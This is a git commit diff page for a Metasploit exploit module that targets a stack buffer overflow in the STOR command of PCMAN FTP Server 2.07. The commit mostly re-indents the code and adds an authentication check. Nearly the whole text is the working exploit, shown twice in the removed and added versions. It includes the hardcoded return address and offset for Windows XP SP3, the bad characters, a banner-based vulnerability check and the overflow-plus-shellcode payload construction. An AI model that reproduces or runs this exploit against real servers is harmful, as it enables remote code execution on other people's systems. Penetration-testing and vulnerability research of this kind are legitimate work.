Retabbed
sinn3r
parent
7d17eef7a7
commit
9d67cbb4db
|
|
@ -8,71 +8,78 @@
|
|||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = AverageRanking
|
||||
Rank = NormalRanking
|
||||
|
||||
include Msf::Exploit::Remote::Ftp
|
||||
include Msf::Exploit::Remote::Ftp
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'PCMAN FTP Server STOR Command Stack Buffer Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a buffer overflow vulnerability
|
||||
found in the STOR command of the PCMAN FTP v2.07 Server
|
||||
when the "/../" parameters are also sent to the server.
|
||||
},
|
||||
'Author' => [
|
||||
'Christian (Polunchis) Ramirez', # Initial Discovery
|
||||
'Rick (nanotechz9l) Flores', # Metasploit Module
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
[ 'OSVDB', '94624'],
|
||||
[ 'EDB', '27703'],
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'process',
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 1000,
|
||||
'BadChars' => "\x00\xff\x0a\x0d\x20\x40",
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Windows XP SP3',
|
||||
{
|
||||
'Ret' => 0x77c35459, # push esp ret C:\WINDOWS\system32\msvcrt.dll
|
||||
'Offset' => 2002
|
||||
}
|
||||
],
|
||||
],
|
||||
'DisclosureDate' => 'Jun 27 2013',
|
||||
'DefaultTarget' => 0))
|
||||
end
|
||||
|
||||
def check
|
||||
connect
|
||||
disconnect
|
||||
if (banner =~ /220 PCMan's FTP Server 2\.0/)
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'PCMAN FTP Server Post-Authentication STOR Command Stack Buffer Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a buffer overflow vulnerability found in the STOR command of the
|
||||
PCMAN FTP v2.07 Server when the "/../" parameters are also sent to the server. Please
|
||||
note authentication is required in order to trigger the vulnerability.
|
||||
},
|
||||
'Author' => [
|
||||
'Christian (Polunchis) Ramirez', # Initial Discovery
|
||||
'Rick (nanotechz9l) Flores' # Metasploit Module
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
[ 'OSVDB', '94624'],
|
||||
[ 'EDB', '27703']
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'process',
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 1000,
|
||||
'BadChars' => "\x00\xff\x0a\x0d\x20\x40",
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Windows XP SP3 English',
|
||||
{
|
||||
'Ret' => 0x77c35459, # push esp ret C:\WINDOWS\system32\msvcrt.dll
|
||||
'Offset' => 2002
|
||||
}
|
||||
],
|
||||
],
|
||||
'DisclosureDate' => 'Jun 27 2013',
|
||||
'DefaultTarget' => 0))
|
||||
end
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
def exploit
|
||||
connect_login
|
||||
def check
|
||||
connect
|
||||
disconnect
|
||||
|
||||
print_status("Trying victim #{target.name}...")
|
||||
if (banner =~ /220 PCMan's FTP Server 2\.0/)
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
end
|
||||
|
||||
sploit = rand_text_alpha(target['Offset']) << [target.ret].pack('V') << make_nops(4) << payload.encoded
|
||||
|
||||
sploit << rand_text_alpha(sploit.length)
|
||||
|
||||
send_cmd( ["STOR", "/../" + sploit], false )
|
||||
|
||||
disconnect
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
|
||||
def exploit
|
||||
connect_login
|
||||
|
||||
# Auth failed. The mixin should show the error, so we just bail.
|
||||
return unless connect_login
|
||||
|
||||
print_status("Trying victim #{target.name}...")
|
||||
sploit = rand_text_alpha(target['Offset'])
|
||||
sploit << [target.ret].pack('V')
|
||||
sploit << make_nops(4)
|
||||
sploit << payload.encoded
|
||||
sploit << rand_text_alpha(sploit.length)
|
||||
|
||||
send_cmd( ["STOR", "/../" + sploit], false )
|
||||
disconnect
|
||||
end
|
||||
|
||||
end
|
||||
|
|
|
|||
Loading…
Reference in New Issue